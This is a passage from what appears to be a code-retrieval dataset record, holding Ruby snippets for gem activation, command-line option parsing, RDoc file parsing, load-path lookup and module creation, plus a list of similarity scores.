= Gem::Resolver.for_current_gems(dependencies)\n activation_requests = resolver.resolve\n $logger.debug \"Processing #{activation_requests.size} activation requests\"\n activation_requests.each do |request|\n do_activate = true\n spec = request.spec\n\n # check if this is one of our embedded gems\n if 
original_embedded_gems[spec.name]\n\n # check if gem can be loaded from RUBYLIB, this supports developer use case\n original_load_path.each do |lp|\n if File.exists?(File.join(lp, spec.name)) || File.exists?(File.join(lp, spec.name + '.rb')) || File.exists?(File.join(lp, spec.name + '.so'))\n $logger.debug \"Found #{spec.name} in '#{lp}', overrides gem #{spec.spec_file}\"\n Gem::Specification.remove_spec(spec)\n do_activate = false\n break\n end\n end\n end\n\n if do_activate\n $logger.debug \"Activating gem #{spec.spec_file}\"\n begin\n spec.activate\n rescue Gem::LoadError\n $logger.error \"Error activating gem #{spec.spec_file}\"\n activation_errors = true\n end\n end\n\n end\n\n if activation_errors\n return false\n end\n\n ensure\n Dir.chdir(current_dir)\n end\n\n end # use_bundler\n\n # Handle -e commands\n remove_indices = []\n $eval_cmds = []\n main_args.each_index do |i|\n\n if main_args[i] == '-e' || main_args[i] == '--execute'\n # remove from further processing\n remove_indices << i\n remove_indices << i+1\n\n cmd = main_args[i + 1]\n\n if cmd.nil?\n $logger.error \"#{main_args[i]} requires second argument CMD\"\n return false\n end\n\n $eval_cmds << cmd\n end\n end\n remove_indices.reverse_each {|i| main_args.delete_at(i)}\n\n if !main_args.empty?\n $logger.error \"Unknown arguments #{main_args} found\"\n return false\n end\n\n return true\nend",
"def option_parser options\n CooCoo::OptionParser.new do |o|\n o.banner = \"The CIFAR data set\"\n \n o.on('--images-path PATH') do |path|\n options.images_paths << path\n end\n\n o.on('--labels-path PATH') do |path|\n options.labels_path = path\n end\n\n o.on('--translations INTEGER') do |n|\n options.translations = n.to_i\n end\n\n o.on('--translation-amount DEGREE') do |n|\n options.translation_amount = n.to_i\n end\n\n o.on('--rotations INTEGER') do |n|\n options.rotations = n.to_i\n end\n\n o.on('--rotation-amount DEGREE') do |n|\n options.rotation_amount = n.to_i\n end\n end\n end",
"def execute\n res = @include_list.map { |re_file| IO.read File.join(File.dirname(@file),re_file) }\n res << IO.read(@file)\n res.join \"\\n\"\n end",
"def parse_files(options)\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true, options.exclude)\n\n return [] if file_list.empty?\n\n jobs = SizedQueue.new(number_of_threads * 3)\n workers = []\n file_info = []\n file_info_lock = Mutex.new\n\n Thread.abort_on_exception = true\n @stats = Stats.new(file_list.size, options.verbosity)\n @stats.begin_adding(number_of_threads)\n\n # Create worker threads.\n number_of_threads.times do\n thread = Thread.new do\n while (filename = jobs.pop)\n @stats.add_file(filename)\n content = read_file_contents(filename)\n top_level = ::RDoc::TopLevel.new filename\n\n parser = ::RDoc::Parser.for(top_level, filename, content, options,\n @stats)\n result = parser.scan\n\n file_info_lock.synchronize do\n file_info << result\n end\n end\n end\n workers << thread\n end\n\n # Feed filenames to the parser worker threads...\n file_list.each do |filename|\n jobs << filename\n end\n workers.size.times do\n jobs << nil\n end\n\n # ...and wait until they're done.\n workers.each do |thread|\n thread.join\n end\n\n @stats.done_adding\n\n file_info\n end",
"def setup_options(rdoc_options)\n\n options = {\n :stylesheet_url => nil,\n #:index_attributes => false,\n #:ancestor_lists => false,\n #:list_standard_ancestors => false,\n :see_standard_ancestors => false,\n }\n\n rdoc_options.extend Options # 1. extend the existing object\n rdoc_options.class.include Options # 2. make sure #babel_options will be there on #dup'ed objects\n rdoc_options.babel_options = options\n\n opt = rdoc_options.option_parser\n\n opt.separator \"Babel options:\"\n opt.separator nil\n\n opt.on('--style=URL', '-s',\n 'Specifies the URL of a stylesheet',\n 'that the template should use.',\n 'The default is \"rdoc.css\".') do |value|\n options[:stylesheet_url] = value\n end\n opt.separator nil\n\n=begin\n opt.on('--index-attributes',\n 'Include attributes in the method index.',\n 'By default, only methods are included.') do |value|\n options[:index_attributes] = true\n end\n opt.separator nil\n\n opt.on('--ancestor-lists',\n 'Add lists of ancestor methods, attributes,',\n 'aliases and constants in the documentation',\n 'of a class/module.') do |value|\n options[:ancestor_lists] = true\n end\n opt.separator nil\n\n opt.on('--list-standard-ancestors',\n 'Include Kernel/Object methods',\n 'in ancestor methods.') do |value|\n options[:list_standard_ancestors] = true\n end\n opt.separator nil\n=end\n\n opt.on('--see-standard-ancestors',\n 'Add links to Kernel/Object',\n 'ancestor methods.') do |value|\n options[:see_standard_ancestors] = true\n end\n opt.separator nil\n\n end",
"def list_files(paths = T.unsafe(nil), options = T.unsafe(nil)); end",
"def list_files(paths = T.unsafe(nil), options = T.unsafe(nil)); end",
"def include_file(spec)\n elements << Raw.new(\" Include '#{spec}'\")\n end",
"def link_include_file(file); end",
"def link_include_file(file); end",
"def definition_file_paths; end",
"def load_path(match, options={})\n return [] if options[:from]\n\n options = valid_load_options(options)\n\n found = []\n $LOAD_PATH.uniq.each do |path|\n list = Dir.glob(File.join(File.expand_path(path), match))\n list = list.map{ |d| d.chomp('/') }\n # return absolute path unless relative flag\n if options[:relative]\n # the extra '' in File.join adds a '/' to the end of the path\n list = list.map{ |f| f.sub(File.join(path, ''), '') }\n end\n found.concat(list)\n end\n found\n end",
"def parse(args)\n @options = {\n reporters: [DEFAULT_REPORTER],\n }\n\n OptionParser.new do |parser|\n parser.banner = \"Usage: #{parser.program_name} [options] [scss-files]\"\n\n add_display_options parser\n add_linter_options parser\n add_file_options parser\n add_info_options parser\n end.parse!(args)\n\n # Any remaining arguments are assumed to be files\n @options[:files] = args\n\n @options\n rescue OptionParser::InvalidOption => e\n raise SCSSLint::Exceptions::InvalidCLIOption,\n e.message,\n e.backtrace\n end",
"def load_path(match, options={})\n options = valid_load_options(options)\n\n specs = specifications(options)\n\n matches = []\n specs.each do |spec|\n list = []\n spec.require_paths.each do |path|\n glob = File.join(spec.full_gem_path, path, match)\n list = Dir[glob] #.map{ |f| f.untaint }\n list = list.map{ |d| d.chomp('/') }\n # return relative paths unless absolute flag\n if options[:relative] #not options[:absolute]\n # the extra '' in File.join adds a '/' to the end of the path\n list = list.map{ |f| f.sub(File.join(spec.full_gem_path, path, ''), '') }\n end\n matches.concat(list)\n end\n # activate the library if activate flag\n spec.activate if options[:activate] && !list.empty?\n end\n matches\n end",
"def command\n log.debug self.pretty_inspect\n\n throw 'Invalid linker' unless @ld.is_a?(Linker)\n throw 'One or more source files are required' unless @sources.length > 0\n# cflags = default_flags\n# cflags.concat @flags\n# end\n# throw cflags\n\n# topdir = h[:topdir] || ''\n# ld = @ld\n# ldadd = h[:ldadd]\n# ld.flags = h[:ldflags]\n# ld.output = Platform.pathspec(h[:output])\n# ld.rpath = h[:rpath] if h[:rpath].length > 0\n\n# inputs = h[:sources]\n# inputs = [ inputs ] if inputs.is_a? String\n# inputs = inputs.map { |x| Platform.pathspec(topdir + x) }\n# throw 'One or more sources are required' unless inputs.count\n\n#TODO:if @combine\n# return [ @path, cflags, '-combine', ldflags, inputs, ldadd ].flatten.join(' ')\n#\n \n cmd = [ @path, '-DHAVE_CONFIG_H', '-I.', @platform_cflags, flags, '-c', @sources ].flatten.join(' ')\n\n cmd += Platform.dev_null if @quiet\n\n log.debug \"Compiler command: #{cmd}\"\n\n cmd\n end",
"def parse_args(args)\n options = {\n :excount => 5,\n :testdata => nil,\n :console => false,\n :raw => false,\n :pronounciation_offset => 1,\n :definition_offset => 2,\n :url => \"m\"\n }\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = \"Usage: #{$0} <input filepath> [options]\"\n\n opts.separator \"\"\n opts.separator \"Data options:\"\n opts.on(\"-p N\", Integer, \"Offset to pronunciation column, default 1\") do |n|\n options[:pronounciation_offset] = n\n end\n opts.on(\"-d N\", Integer, \"Offset to definition column, default 2\") do |n|\n options[:definition_offset] = n\n end\n opts.on(\"-n N\", Integer, \"Number of example sentences, default 5\") do |n|\n options[:excount] = n\n end\n opts.on(\"-u U\", String, \"Source url (#{WWWJDICExampleProvider::SOURCES.to_s}), default #{options[:url]}\") do |u|\n options[:url] = u\n end\n\n opts.separator \"\"\n opts.separator \"Testing:\"\n opts.on(\"-t\", \"--testdata [DATAFILE]\",\n \"Path to yaml data file of examples (useful for testing)\") do |d|\n options[:testdata] = d\n end\n\n opts.separator \"\"\n opts.separator \"Output:\"\n opts.on(\"-c\", \"--console\", \"Dump to console only\") do |c|\n options[:console] = c\n end\n opts.on(\"-r\", \"--raw\", \"Output raw data (all examples)\") do |c|\n options[:raw] = c\n end\n\n opts.separator \"\"\n opts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n puts opts\n exit\n end\n end\n\n opt_parser.parse!(args)\n options\nend",
"def find(path, options={})\n path = path.to_s\n\n suffix = options[:suffix]\n search = options[:search]\n legacy = options[:legacy]\n\nprint path if MONITOR\n\n # Ruby appears to have a special exception for enumerator!!!\n #return nil if path == 'enumerator' \n\n # TODO: absolute path ???\n if /^\\// =~ path\n return nil\n end\n\n if path.index(':') # a specified library\n name, path = path.split(':')\n lib = Library.open(name)\n file = lib.include?(path, options)\nputs \" (1 direct)\" if MONITOR\n return file\n end\n\n # try the load stack (TODO: just last or all?)\n load_stack.reverse_each do |lib|\n if file = lib.include?(path, options)\nputs \" (2 stack)\" if MONITOR\n return file\n end\n end\n #last = load_stack.last\n #if last && file = last.include?(file)\n # return file\n #end\n\n # if the head of the path is the library\n if path.index('/') or path.index('\\\\')\n name, *_ = path.split(/\\/|\\\\/)\n lib = Library[name]\n if lib && file = lib.include?(path, options)\nputs \" (3 indirect)\" if MONITOR\n return file\n end\n end\n\n # try ruby\n lib = Library['ruby']\n if file = lib.include?(path, options)\nputs \" (4 ruby core)\" if MONITOR\n return file\n end\n \n # a plain library name?\n if !path.index('/') && lib = Library.instance(path)\n if file = lib.default # default file to load\nputs \" (5 plain library name)\" if MONITOR\n return file\n end\n end\n\n # if fallback to brute force search\n if search or legacy\n result = search(path, options)\nputs \" (6 brute search)\" if MONITOR\n return result if result\n end\n\nputs \" (7 fallback)\" if MONITOR\n nil\n end",
"def parse(args)\n arg_list = arg_groups(args)\n options = DEFAULT_OPTIONS.dup\n options[:exclude] += default_excludes\n options[:locations] = arg_list.shift\n\n arg_list.reject(&:empty?).each do |set|\n flag, *args = set\n args.map! { |arg| arg.delete(\"/\") } # \"log/\" => \"log\"\n\n case flag\n when '-f', '--flags' then options[:flags] += args\n when '-e', '--exclude' then options[:exclude] += args\n else puts \"Unknown argument: #{flag}\"\n end\n end\n\n options\n end",
"def initialize(options)\n if (@json_paths = options[:paths]).nil?\n puts 'Please specify path to JSON files with --paths'\n exit 1\n end\n end"
] |
[
"0.6914934",
"0.6285592",
"0.60384244",
"0.58239883",
"0.5822146",
"0.57213515",
"0.5713939",
"0.5686055",
"0.5673936",
"0.5671525",
"0.5652372",
"0.56276816",
"0.55707955",
"0.5570621",
"0.5567354",
"0.55640113",
"0.55187756",
"0.5454527",
"0.5442466",
"0.5412935",
"0.54004455",
"0.53819674",
"0.5359477",
"0.5353765",
"0.53508973",
"0.53230876",
"0.53159726",
"0.5263498",
"0.524566",
"0.52416205",
"0.52255464",
"0.52146214",
"0.52126485",
"0.52065146",
"0.5181748",
"0.5178305",
"0.5176764",
"0.5169973",
"0.5160749",
"0.5158589",
"0.51451945",
"0.5143236",
"0.5129177",
"0.5128268",
"0.5125288",
"0.5124706",
"0.50886256",
"0.50848985",
"0.50848883",
"0.506889",
"0.50684345",
"0.50669754",
"0.5062346",
"0.5056678",
"0.50461775",
"0.5038622",
"0.50350165",
"0.50283706",
"0.502201",
"0.5015353",
"0.50083435",
"0.50016385",
"0.49946064",
"0.4991444",
"0.49892244",
"0.49802092",
"0.49636543",
"0.49621168",
"0.49571186",
"0.4952758",
"0.4946889",
"0.49462056",
"0.49396417",
"0.4937052",
"0.49266243",
"0.49215674",
"0.49190497",
"0.4914453",
"0.48959506",
"0.4891163",
"0.48740122",
"0.4873259",
"0.48352197",
"0.48346236",
"0.4831704",
"0.48261264",
"0.48192194",
"0.48178896",
"0.48105025",
"0.4806578",
"0.4806578",
"0.47962633",
"0.47904158",
"0.47859815",
"0.47811705",
"0.47683334",
"0.47651544",
"0.47586456",
"0.47557524",
"0.47541365"
] |
0.65172637
|
1
|
Set a namespace to be the main namespace used for this extension. Specifying a namespace on the Extension itself will mark functions, classes, enums, etc. as globally available to Ruby (i.e. not wrapped in their own module). To get access to the underlying RbGCCXML query system, save the return value of this method: node = namespace "lib::to_wrap"
|
def namespace(name)
@node = @parser.namespaces(name)
end
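A minimal usage sketch for reference (the Extension block form and the lib::to_wrap namespace are illustrative assumptions drawn from the query text, not part of this record):

# Hypothetical rb++-style usage; Extension and the C++ namespace name are placeholders.
Extension.new "wrapper" do |e|
  node = e.namespace "lib::to_wrap"  # contents of lib::to_wrap become globally available to Ruby
  # node is the underlying RbGCCXML query result, so further queries such as
  # node.classes or node.functions are possible, assuming the RbGCCXML node API.
end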
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def namespace=(ns); end",
"def namespace=(ns); end",
"def set_namespace(namespace)\n return unless namespace\n\n @namespace = namespace\n @ext.set_namespace(namespace)\n end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def get_namespace(node, prefix); end",
"def namespace(namespace = nil)\n @namespace = namespace if namespace\n @namespace\n end",
"def namespace(namespace = nil)\n @namespace = namespace if namespace\n @namespace if defined? @namespace\n end",
"def set_namespace(ns = '')\n settings['namespace'] = ns\n end",
"def namespace=(v); end",
"def namespace\n @namespace.ns\n end",
"def namespace\n @namespace\n end",
"def namespace=(ns)\n return set_namespace(ns) unless ns\n\n unless Nokogiri::XML::Namespace === ns\n raise TypeError, \"#{ns.class} can't be coerced into Nokogiri::XML::Namespace\"\n end\n if ns.document != document\n raise ArgumentError, \"namespace must be declared on the same document\"\n end\n\n set_namespace ns\n end",
"def xml_namespace(node, name, uri, namespaces = {})\n XML::Namespace.new(node, name, uri)\n end",
"def ns(ns)\n self.namespace = ns\n self\n end",
"def fix_namespaces(doc)\n if is_jruby?\n # Only needed in jruby, nokogiri's jruby implementation isn't weird\n # around namespaces in exactly the same way as MRI. We need to keep\n # track of the namespaces in outer contexts ourselves, and then see\n # if they are needed ourselves. :(\n namespaces = namespaces_stack.compact.reduce({}, :merge)\n default_ns = namespaces.delete(\"xmlns\")\n\n namespaces.each_pair do |attrib, uri|\n ns_prefix = attrib.sub(/\\Axmlns:/, '')\n\n # gotta make sure it's actually used in the doc to not add it\n # unecessarily. GAH.\n if doc.xpath(\"//*[starts-with(name(), '#{ns_prefix}:')][1]\").empty? &&\n doc.xpath(\"//@*[starts-with(name(), '#{ns_prefix}:')][1]\").empty?\n next\n end\n doc.root.add_namespace_definition(ns_prefix, uri)\n end\n\n if default_ns\n doc.root.default_namespace = default_ns\n # OMG nokogiri, really?\n default_ns = doc.root.namespace\n doc.xpath(\"//*[namespace-uri()='']\").each do |node|\n node.namespace = default_ns\n end\n end\n\n end\n return doc\n end",
"def add_namespaces node\n raw.root.namespace_definitions.each do |ns|\n node.add_namespace_definition ns.prefix, ns.href if ns.href != NS\n end\n end",
"def namespace=(value)\n @namespace = value\n end",
"def namespace=(value)\n @namespace = value\n end",
"def namespace(namespace = nil, options = {})\n return @namespace unless namespace\n\n @namespace = namespace.to_sym if namespace\n @base_namespace = options[:base].to_sym if options[:base]\n end",
"def namespace\n NAMESPACE\n end",
"def namespace=(obj); end",
"def namespace(value = nil)\n if value\n @namespace = value\n else\n @namespace\n end\n end",
"def namespace\n @namespace || self.class.namespace\n end",
"def namespace=(ns) @namespace = @store.namespace = ns; end",
"def namespace(namespace, &block)\n ::Dry::Container::NamespaceDSL.new(\n self,\n namespace,\n config.namespace_separator,\n &block\n )\n\n self\n end",
"def namespace(prefix = T.unsafe(nil)); end",
"def namespace(ns)\n if ns == :interpreter\n self\n else\n @storage[ns]\n end\n end",
"def namespace\n return NAMESPACE\n end",
"def namespace(path, options = T.unsafe(nil)); end",
"def namespace\n read_property 'RootNamespace'\n end",
"def namespace\n nil\n end",
"def rootNamespace\n @namespace ? @namespace.rootNamespace : self\n end",
"def namespace\n nil\n end",
"def namespace\n @namespace ||= schema.attributes['Namespace'].value\n end",
"def namespace\n self.class.new split(NAMESPACE_SEPARATOR).first\n end",
"def isolate_namespace(mod); end",
"def isolate_namespace(mod); end",
"def parsingNamespace \n \"parsingNamespace\" \n end",
"def set_default_namespace(value = nil, &block)\n define_attr_method :default_namespace, value, &block\n end",
"def namespace(value)\n merge(namespace: value.to_s)\n end",
"def namespace\n return @namespace\n end",
"def namespace\n return @namespace\n end",
"def namespace=(value)\n self.namespaces = [value]\n end",
"def namespace\n @namespace ||= metadata.xpath('//Schema').first.attributes['Namespace'].value\n end",
"def element_by_xpath_with_default_namespace(xpath_without_ns)\n xpath_without_ns = xpath_without_ns.to_s\n @xml.xpath(xpath_without_ns.gsub(/(^|\\/{1,2})(\\w+)/, '\\1xmlns:\\2'), :xmlns => OMF_NAMESPACE)\n end",
"def extract_namespace node\n node.ancestors[0].to_s\n end",
"def set_namespace(namespace)\n return if !active? ||\n Appsignal::Transaction.current.nil? ||\n namespace.nil?\n Appsignal::Transaction.current.set_namespace(namespace)\n end",
"def on_axis_namespace(ast_node, context)\n nodes = XML::NodeSet.new\n name = ast_node.children[1]\n\n context.each do |context_node|\n next unless context_node.respond_to?(:available_namespaces)\n\n context_node.available_namespaces.each do |_, namespace|\n if namespace.name == name or name == '*'\n nodes << namespace\n end\n end\n end\n\n return nodes\n end",
"def namespace\n # Not using superclass_delegating_reader because don't want subclasses to modify superclass instance\n #\n if defined?(@namespace)\n @namespace\n elsif superclass != Object && superclass.site\n superclass.site.dup.freeze\n end\n end",
"def namespace=( namespace )\n\t\t@namespace = namespace.nil? ? nil : namespace.to_sym\n\tend",
"def node_ns_definition(node, ns)\n prefix = ns.is_a?(Nokogiri::XML::Namespace) ? ns.prefix : ns\n node.namespace_definitions.find { |n| n.prefix == prefix }\n end",
"def namespace=(namespace)\n @connection = nil\n if namespace.nil?\n @namespace = nil\n else\n @namespace = namespace\n end\n end",
"def start_element_namespace(name, attrs = T.unsafe(nil), prefix = T.unsafe(nil), uri = T.unsafe(nil), ns = T.unsafe(nil)); end",
"def start_element_namespace(name, attrs = T.unsafe(nil), prefix = T.unsafe(nil), uri = T.unsafe(nil), ns = T.unsafe(nil)); end",
"def namespace\n if Types.use_namespaces?\n 'MG'\n else\n ''\n end\n end",
"def namespace_declarations(ctx); end",
"def namespace_declarations(ctx); end",
"def namespace\n self.class.namespace\n end",
"def fix_namespace api, namespace\n namespace.split(\"::\").map { |node| api.fix_namespace node }.join(\"::\")\n end",
"def namespaces; end",
"def namespaces; end",
"def namespaces; end",
"def namespaces; end",
"def namespace=(v)\n cfg_set(:namespace, v)\n end",
"def namespace_inheritance=(_arg0); end",
"def namespace_inheritance=(_arg0); end",
"def namespace(name)\n @node = @parser.namespaces.find(:all, :name => name)\n end",
"def namespace(ns)\n ns.blank? ? \"nil\" : %|\"#{ns.prefix}\"|\nend",
"def namespace=(v)\n cfg_set(:namespace, v)\n end",
"def render namespace\n context = Context.new(namespace)\n context.push(\n :ruty => RUTY_CONTEXT,\n :nil => nil,\n :true => true,\n :false => false\n )\n result = ''\n @nodelist.render_node(context, result)\n result\n end",
"def custom_namespace\n @attributes[:custom_namespace]\n end",
"def node_namespace name:\n label = make_label name\n attrs = { name: name }\n\n add_node :Namespace, label, attrs\n end",
"def define_namespaces #:nodoc:\n unless self.respond_to?(:namespaces)\n send(:define_singleton_method, :namespaces) { @namespaces }\n send(:define_method, :namespaces) { self.class.namespaces }\n end\n end",
"def add_namespaces( node, namespaces )\n #pass nil as the prefix to create a default node\n default = namespaces.delete( \"default\" )\n node.namespaces.namespace = XML::Namespace.new( node, nil, default )\n namespaces.each do |prefix, prefix_uri|\n XML::Namespace.new( node, prefix, prefix_uri )\n end\n end",
"def namespace\n @namespace ||= 'silver_spoon'\n end",
"def set_namespace\n @namespace = Namespace.find(params[:namespace_id])\n end",
"def goo_namespaces\n return if defined?(@@configured) && @@configured\n Goo.configure do |conf|\n conf.add_namespace(:omv, RDF::Vocabulary.new(\"http://omv.ontoware.org/2005/05/ontology#\"))\n conf.add_namespace(:skos, RDF::Vocabulary.new(\"http://www.w3.org/2004/02/skos/core#\"))\n conf.add_namespace(:owl, RDF::Vocabulary.new(\"http://www.w3.org/2002/07/owl#\"))\n conf.add_namespace(:rdfs, RDF::Vocabulary.new(\"http://www.w3.org/2000/01/rdf-schema#\"))\n conf.add_namespace(:metadata, RDF::Vocabulary.new(\"http://data.bioontology.org/metadata/\"), default = true)\n conf.add_namespace(:metadata_def, RDF::Vocabulary.new(\"http://data.bioontology.org/metadata/def/\"))\n conf.add_namespace(:dc, RDF::Vocabulary.new(\"http://purl.org/dc/elements/1.1/\"))\n conf.add_namespace(:xsd, RDF::Vocabulary.new(\"http://www.w3.org/2001/XMLSchema#\"))\n conf.add_namespace(:oboinowl_gen, RDF::Vocabulary.new(\"http://www.geneontology.org/formats/oboInOWL#\"))\n conf.add_namespace(:obo_purl, RDF::Vocabulary.new(\"http://purl.obolibrary.org/obo/\"))\n conf.add_namespace(:umls, RDF::Vocabulary.new(\"http://bioportal.bioontology.org/ontologies/umls/\"))\n conf.id_prefix = \"http://data.bioontology.org/\"\n conf.pluralize_models(true)\n end\n @@configured = true\n end",
"def get_namespace( node, prefix )\n if @namespaces\n return @namespaces[prefix] || ''\n else\n return node.namespace( prefix ) if node.node_type == :element\n return ''\n end\n end",
"def emit_bnode_namespace(collector, namespace)\n if collector and collector.respond_to? :bnode_namespace=\n collector.bnode_namespace = namespace\n end\n end",
"def namespace\n Matsuri::Platform.send(Matsuri::Config.environment).namespace || 'default'\n end",
"def end_element_namespace(name, prefix = T.unsafe(nil), uri = T.unsafe(nil)); end",
"def end_element_namespace(name, prefix = T.unsafe(nil), uri = T.unsafe(nil)); end",
"def add_namespace(namespace) \n @namespaces[namespace.name] = namespace\n end",
"def inherited_namespace(prefix=inherited_prefix)\n namespace(prefix)\n end",
"def parse_namespace\n skip_tkspace\n\n tk = get_tk\n\n namespace = @container.add_module RDoc::RakeNamespace, tk.text[1..-1]\n\n skip_tkspace\n\n old_namespace = @container\n\n begin\n @nest += 1\n @container = namespace\n\n parse_rakefile\n ensure\n @container = old_namespace\n @nest -= 1\n end\n end",
"def setNamespace(prefix, uri) \n @obj.setNamespace(prefix, uri)\n end",
"def namespace\n @namestack.join(\"::\")\n end",
"def define_namespace_method(scope, name, opts = {}, &block)\n method = scope == :instance ? :define_singleton_method : :define_method\n\n send(method, name) do\n ivar = instance_variable_get(:\"@#{name}\")\n return ivar unless ivar.nil?\n\n namespace_element = @xml_element.locate(opts[:xpath]).first\n\n namespace = Namespace.new(name.to_sym, namespace_element, &block)\n\n instance_variable_set(:\"@#{name}\", namespace)\n end\n end",
"def default_namespace(url)\n @namespaces[''] = url\n end",
"def test_namespace\n N::Namespace.shortcut(:test_namespace, \"http://test_namespace/\")\n assert_equal(:test_namespace, N::URI.new(\"http://test_namespace/\").namespace)\n assert_equal(:test_namespace, N::URI.new(\"http://test_namespace/else\").namespace)\n assert_equal(nil, N::URI.new(\"http://test_namespace/else/other\").namespace)\n end",
"def namespaces\n root ? root.namespaces : {}\n end",
"def namespace\n @namespace ||= [request.args.namespace_name, request.args.application_name].compact.join('-')\n end",
"def namespace(arg = T.unsafe(nil)); end"
] |
[
"0.66401315",
"0.66401315",
"0.6406295",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.61648786",
"0.6104583",
"0.60997504",
"0.6025059",
"0.6011422",
"0.60000217",
"0.592806",
"0.5899432",
"0.58949035",
"0.58898",
"0.5887394",
"0.58839947",
"0.58737606",
"0.58737606",
"0.5855702",
"0.5841067",
"0.5826671",
"0.5814587",
"0.58042175",
"0.5799384",
"0.579186",
"0.5779668",
"0.57494396",
"0.57204646",
"0.5702763",
"0.5698502",
"0.56841844",
"0.56620926",
"0.5659396",
"0.5655202",
"0.5642441",
"0.5624832",
"0.5624832",
"0.56017643",
"0.55685395",
"0.5566532",
"0.55527204",
"0.55527204",
"0.5542784",
"0.5520879",
"0.5506518",
"0.5487226",
"0.54863656",
"0.54847187",
"0.54502",
"0.54494715",
"0.54418623",
"0.5434692",
"0.54310447",
"0.54310447",
"0.5424215",
"0.53908694",
"0.53908694",
"0.5373441",
"0.5372519",
"0.5370403",
"0.5370403",
"0.5370403",
"0.5370403",
"0.53648865",
"0.5330579",
"0.5330579",
"0.5327341",
"0.5326872",
"0.53268677",
"0.53120095",
"0.5309422",
"0.5303572",
"0.5301154",
"0.5293825",
"0.5286955",
"0.5282032",
"0.52539426",
"0.52281624",
"0.52206296",
"0.5207745",
"0.52073276",
"0.52073276",
"0.5203742",
"0.5201405",
"0.51928824",
"0.5186996",
"0.51630414",
"0.51621526",
"0.51526636",
"0.5147916",
"0.51303315",
"0.5129925",
"0.5125721"
] |
0.54854494
|
54
|
Mark that this extension needs to create a Ruby module of a given name. Like Extension.new, this can be used with or without a block.
|
def module(name, &block)
m = RbModule.new(name, @parser, &block)
@modules << m
m
end
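A short sketch of the block and non-block forms (the receiver ext and the module names are hypothetical; RbModule handling the block itself is an assumption based on the constructor call above):

# Hypothetical usage; both forms return the RbModule for later configuration.
ext.module "Geometry" do |m|
  m.namespace "geo"  # assuming RbModule exposes a namespace method, as sibling snippets suggest
end

points = ext.module "Points"  # no block: configure the returned RbModule afterwards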
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_module(name, &block)\n mod = Module.new(&block)\n @managed.const_set(name, mod)\n mod\n end",
"def create(name)\n\t\t# Check to see if it has a module type prefix. If it does,\n\t\t# try to load it from the specific module set for that type.\n\t\tif (md = name.match(/^(#{MODULE_TYPES.join('|')})\\/(.*)$/))\n\t\t\tmodule_sets[md[1]].create(md[2])\n\t\t# Otherwise, just try to load it by name.\n\t\telse\n\t\t\tsuper\n\t\tend\n\tend",
"def include_new_module(module_name, &content)\n include Named::Module.new(module_name, &content)\n end",
"def module(name, &block)\n m = RbModule.new(name, @parser, &block)\n m.parent = self\n @modules << m\n end",
"def on_module(node)\n define_module(node, DefinitionBuilder::RubyModule)\n end",
"def register(&block)\n extend Module.new(&block)\n end",
"def make_global!\n @is_module = true\n end",
"def definition\n \"module #{full_name}\"\n end",
"def add_module(name)\n require name\n\n m = name.downcase.gsub(File::SEPARATOR, '_')\n method(\"dispatch_#{m}\".intern).call(self)\n\n self\n end",
"def definition_extension(*names, &block)\n eigenclass = class << self; self; end\n unless names.empty?\n names.each do |name|\n eigenclass.__send__(:include, name)\n end\n end\n eigenclass.send(:class_eval, &block) if block\n end",
"def util_dummy_extension(spec, name = \"a\")\n extconf = File.join(\"ext\", name, \"extconf.rb\")\n dummy_c = File.join(\"ext\", name, \"dummy.c\")\n\n spec.extensions << extconf\n spec.files << dummy_c\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(extconf)\n\n # extconf.rb\n File.open extconf, \"w\" do |f|\n f.write <<~EOF\n require \"mkmf\"\n\n create_makefile(\"#{name}\")\n EOF\n end\n\n # dummy.c\n File.open dummy_c, \"w\" do |f|\n f.write <<~EOF\n #include <ruby.h>\n\n void Init_#{name}(void)\n {\n rb_p(ID2SYM(rb_intern(\"ok\")));\n }\n EOF\n end\n end\n end",
"def add_module(module_name, options = T.unsafe(nil)); end",
"def add_module(name)\n add_namespace(name, \"\")\n end",
"def extended(a_module)\n end",
"def create(name)\n\t\t\n\t\t# if (mod_ambiguous[name])\n\t\t#\traise Rex::AmbiguousArgumentError.new(name), \n\t\t#\t\t\"The module name #{name} is ambiguous.\", caller\n\t\t# end\n\n\t\tklass = get_hash_val(name)\n\t\tinstance = nil\n\n\t\t# If there is no module associated with this class, then try to demand\n\t\t# load it.\n\t\tif (klass.nil? or klass == SymbolicModule)\n\t\t\t# If we are the root module set, then we need to try each module\n\t\t\t# type's demand loading until we find one that works for us.\n\t\t\tif (module_type.nil?)\n\t\t\t\tMODULE_TYPES.each { |type|\n\t\t\t\t\tframework.modules.demand_load_module(type + '/' + name)\n\t\t\t\t}\n\t\t\telse\n\t\t\t\tframework.modules.demand_load_module(module_type + '/' + name)\n\t\t\tend\n\n\t\t\tklass = get_hash_val(name)\n\t\tend\n\n\t\t# If the klass is valid for this name, try to create it\n\t\tif (klass and klass != SymbolicModule)\n\t\t\tinstance = klass.new\n\t\tend\n\n\t\t# Notify any general subscribers of the creation event\n\t\tif (instance)\n\t\t\tself.framework.events.on_module_created(instance)\n\t\tend\n\n\t\treturn instance\n\tend",
"def create_module_and_branch?(opts = {})\n if module_obj = module_exists?\n module_branch_exists? || create_module_branch(module_obj)\n else\n create_module_and_branch(create_implementation: opts[:create_implementation])\n end\n end",
"def register_module\n unless Object.const_defined? module_name\n Object.const_set module_name, Module.new\n end\n end",
"def setup_module(module_name)\n Object.make_module(module_name)\n slice_mod = Object.full_const_get(module_name)\n slice_mod.extend(ModuleMixin)\n slice_mod\n end",
"def def_module(methodname='erb')\n mod = Module.new\n def_method(mod, methodname, @filename || '(ERB)')\n mod\n end",
